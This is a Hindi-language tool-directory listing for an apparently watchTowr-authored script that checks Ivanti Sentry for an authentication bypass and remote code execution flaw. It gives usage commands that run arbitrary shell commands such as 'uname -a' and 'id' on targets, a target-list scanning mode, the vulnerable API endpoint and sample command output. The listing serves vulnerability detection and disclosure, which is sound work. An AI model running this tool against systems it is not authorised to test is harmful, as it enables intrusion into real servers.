Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/imbas007/rce-cve-2026-10520-cve-2026-10523
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubimbas007/rce-cve-2026-10520-cve-2026-10523

RCE-CVE-2026-10520-CVE-2026-10523

Ivanti Sentry प्रमाणीकरण बायपास और RCE भेद्यताओं (CVE-2026-10520, CVE-2026-10523) के लिए डिटेक्शन आर्टिफैक्ट जनरेटर। एक या एकाधिक लक्ष्यों को स्कैन करता है, कमांड निष्पादित करता है, और भेद्य होस्टों की रिपोर्ट करता है।

रिपॉजिटरी देखें
14घं 38मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10520 और CVE-2026-10523

एक Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन डिटेक्शन आर्टिफैक्ट जनरेटर।

तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें।

कार्रवाई में डिटेक्शन

root@kitploit:~
$ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            

        CVE-2026-10523.py

        (*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool

          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2026-10520, CVE-2026-10523]

============================================================
Target: https://127.0.0.1
Command: uname -a

[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux

उपयोग

एकल लक्ष्य:

root@kitploit:~
python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"

फ़ाइल से कई लक्ष्य (प्रति पंक्ति एक URL, रिक्त पंक्तियाँ और # टिप्पणियाँ अनदेखी की जाती हैं):

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"

प्रॉक्सी का उपयोग करें:

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080

लिस्ट मोड हर लक्ष्य को स्कैन करता है, कनेक्शन त्रुटियों पर जारी रहता है, और अंत में कमजोर होस्ट्स का सारांश प्रिंट करता है।

विवरण

यह watchTowr डिटेक्शन आर्टिफैक्ट जनरेटर Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन कमजोरियों CVE-2026-10520, CVE-2026-10523 की जाँच करता है।

उपचार और आगे के विवरण Ivanti एडवाइजरी में पाए जा सकते हैं: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

श्रेय:

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें